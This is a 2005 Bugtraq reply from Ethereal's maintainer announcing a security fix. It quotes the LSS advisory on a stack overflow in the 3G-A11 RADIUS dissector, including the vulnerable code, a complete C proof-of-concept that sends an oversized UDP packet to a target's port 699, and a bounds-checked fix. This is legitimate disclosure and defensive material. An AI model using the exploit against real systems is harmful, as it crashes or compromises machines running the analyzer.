Date: Tue, 08 Mar 2005 17:45:59 -0600
From: Gerald Combs <gerald@...ereal.com>
To: Bugtraq <bugtraq@...urityfocus.com>
Subject: Re: Ethereal remote buffer overflow


Ethereal 0.10.10 will be released on Thursday, March 10.  It will fix
this as well as two other security and stability-related issues.  If you
need a fix immediately, you can download source tarballs and Windows
installers from

    http://www.ethereal.com/distribution/buildbot-builds/


LSS Security wrote:
> 			LSS Security Advisory #LSS-2005-03-04
> 			       http://security.lss.hr
> 
> ---
> 
> Title			:  Ethereal remote buffer overflow
> Advisory ID		:  LSS-2005-03-04
> Date			:  08.03.2005 
> Advisory URL		:  http://security.lss.hr/en/index.php?page=exp 
> Impact			:  Stack overflow and possible code execution
> Risk level		:  High 
> Vulnerability type	:  Remote 
> Vendors contacted	:  Yes
> 
> ---
> 
> 
> 
> 
> ===[ Overview 
> 
> Ethereal is used by network professionals around the world for troubleshooting, 
> analysis, software and protocol development, and education. It has all of the 
> standard features you would expect in a protocol analyzer, and several 
> features not seen in any other product. Its open source license allows talented 
> experts in the networking community to add enhancements. It runs on all popular 
> computing platforms, including Unix, Linux, and Windows.
> 
> 
> 
> ===[ Vulnerability
> 
> There is a remote buffer overflow vulnerability in the Ethereal dissector for 
> CDMA2000 A11 packets. The vulnerability is located in the dissect_a11_radius() 
> function in packet-3g-a11.c, used for RADIUS authentication dissection. The 
> number of bytes that will be copied from the packet to a buffer on the stack is 
> taken from the packet itself. 16 bytes are reserved for that buffer, and the 
> string length can be up to 256 bytes (unsigned char), so it is possible to 
> overflow local variables and the return address. 
> 
> 
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
>   size_t     radius_len;
>   ...
>   guchar     str_val[MAX_STRVAL]; 
>   ...
>   radius_len = tvb_get_guint8(tvb, offset + 1);
>   ...
>   strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2); 
> ...
> }
> ----------------
> 
> A similar vulnerability was also found in the same function a few lines below, 
> where RADIUS attributes are copied to the stack.
> 
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
>   guint      attribute_len;
>   ...
>   guchar     str_val[MAX_STRVAL];
>   ...
>   attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
>   ...
>   case ATTR_TYPE_STR:
>   strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2),
>          attribute_len - 2); 
> 
> ...
> }
> ----------------
> 
> 
> 
> ===[ Affected versions
> 
> All versions since the 3G-A11 dissector was added to CVS, including the latest, 0.10.9.
> The vulnerability was tested with the latest Ethereal on Linux and Windows.
> 
> 
> 
> ===[ Fix
> 
> It seems that they have fixed that vulnerability just a few days ago, 
> and a new version will probably be available soon from http://www.ethereal.com.
> 
> 
> 
> ===[ PoC Exploit
> 
> The exploit is in the attachment and at the URL http://security.lss.hr/en/PoC/ 
> 
> 
> 
> ===[ Credits
> 
> Credit for this vulnerability goes to Leon Juranic. 
> 
> 
> 
> ===[ LSS Security Contact
>  
>  LSS Security Team, <eXposed by LSS>
>  
>  WWW    : http://security.lss.hr
>  E-mail : security@....hr
>  Tel	: +385 1 6129 775
>   
> 
> 
> 
> 
> 
> ------------------------------------------------------------------------
> 
> /*
>  * 
>  * Ethereal 3G-A11 remote buffer overflow PoC exploit 
>  * --------------------------------------------------
>  * Coded by Leon Juranic <ljuranic@....hr> 
>  * LSS Security <http://security.lss.hr/en/>
>  * 
>  */ 
> 
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <netdb.h>
> 
> 
> int main (int argc, char **argv)
> {
> 	int sock;
> 	struct sockaddr_in sin;
> 	unsigned char buf[1024];
> 	char bla[200];
> 
> 	if (argc < 2) {
> 		fprintf(stderr, "usage: %s <target-ip>\n", argv[0]);
> 		return 1;
> 	}
> 
> 	sock=socket(AF_INET,SOCK_DGRAM,0);
> 	if (sock < 0) {
> 		perror("socket");
> 		return 1;
> 	}
> 
> 	memset(&sin,0,sizeof(sin));
> 	sin.sin_family=AF_INET;
> 	sin.sin_addr.s_addr = inet_addr(argv[1]);
> 	sin.sin_port = htons(699);
> 
> 	/* bytes not set below go out as zero instead of uninitialised stack data */
> 	memset(buf,0,sizeof(buf));
> 	buf[0] = 22;
> 	memset(buf+1,'A',19);
> 	buf[20] = 38;
> 	*(unsigned short*)&buf[22] = htons(100); 
> 	*(unsigned short*)&buf[28] = 0x0101;
> 	buf[30] = 31;
> 	buf[31] = 150;   // len for overflow...play with this value if it doesn't work
> 
> 	memset (bla,'B',200);
> 	strncpy ((char*)buf+32,bla,180);
> 	
> 	sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
> 	close(sock);
> 	return 0;
> }
> 
> 


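The missing length check the advisory describes, as an added example that is neither Ethereal's nor LSS's code: a bounds-checked version of the length-prefixed string attribute copy from dissect_a11_radius(), run over a constructed benign attribute and one carrying the PoC's length byte of 150. The [type][len][value] layout, the function names and the sample bytes are assumptions made for illustration.

```c
#include <stdint.h>
#include <string.h>

#define MAX_STRVAL 16   /* same buffer size as str_val[] in the advisory */

/* Attribute layout assumed here: [type][len][value ...]; len counts the type
 * and length bytes too, which is why the original code copies len - 2. */
enum attr_status { ATTR_OK = 0, ATTR_TRUNCATED, ATTR_LEN_TOO_SHORT, ATTR_VALUE_TOO_LONG };

/* Bounds-checked replacement for the unchecked strncpy(): every value taken
 * from the packet is validated before it drives a memory operation.
 * out must hold MAX_STRVAL bytes; *value_len receives the copied size. */
enum attr_status
copy_str_attr_checked(const uint8_t *pkt, size_t pkt_len, size_t offset,
                      char *out, size_t *value_len)
{
    if (pkt_len < 2 || offset > pkt_len - 2)
        return ATTR_TRUNCATED;          /* no room for the type and length bytes */
    size_t attr_len = pkt[offset + 1];  /* packet-controlled, 0..255 */
    if (attr_len < 2)
        return ATTR_LEN_TOO_SHORT;      /* original: attr_len - 2 wraps to SIZE_MAX */
    if (attr_len > pkt_len - offset)
        return ATTR_TRUNCATED;          /* length claims more bytes than the packet holds */
    size_t vlen = attr_len - 2;
    if (vlen > MAX_STRVAL - 1)
        return ATTR_VALUE_TOO_LONG;     /* the advisory's case: 150 - 2 = 148 bytes into 16 */
    memcpy(out, pkt + offset + 2, vlen);
    out[vlen] = '\0';                   /* strncpy() leaves no terminator when vlen == 16 */
    *value_len = vlen;
    return ATTR_OK;
}

/* Constructed sample attributes (not real A11 captures). */
static const uint8_t benign_attr[] = { 0x1f, 12, 'u','s','e','r','@','r','e','a','l','m' };
static uint8_t oversize_attr[150];      /* filled by make_oversize_attr() */

/* Builds an attribute whose length byte is 150, as in the advisory's PoC. */
size_t make_oversize_attr(void)
{
    oversize_attr[0] = 0x1f;
    oversize_attr[1] = 150;
    memset(oversize_attr + 2, 'B', sizeof oversize_attr - 2);
    return sizeof oversize_attr;
}

/* Convenience wrappers: run each sample through the checked copy. */
static char last_value[MAX_STRVAL];
static size_t last_len;
enum attr_status check_benign(void)   { return copy_str_attr_checked(benign_attr, sizeof benign_attr, 0, last_value, &last_len); }
enum attr_status check_oversize(void) { return copy_str_attr_checked(oversize_attr, make_oversize_attr(), 0, last_value, &last_len); }
```

The benign attribute copies cleanly and is NUL-terminated; the 150-byte one is rejected before any copy, which is the check the dissector lacked.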
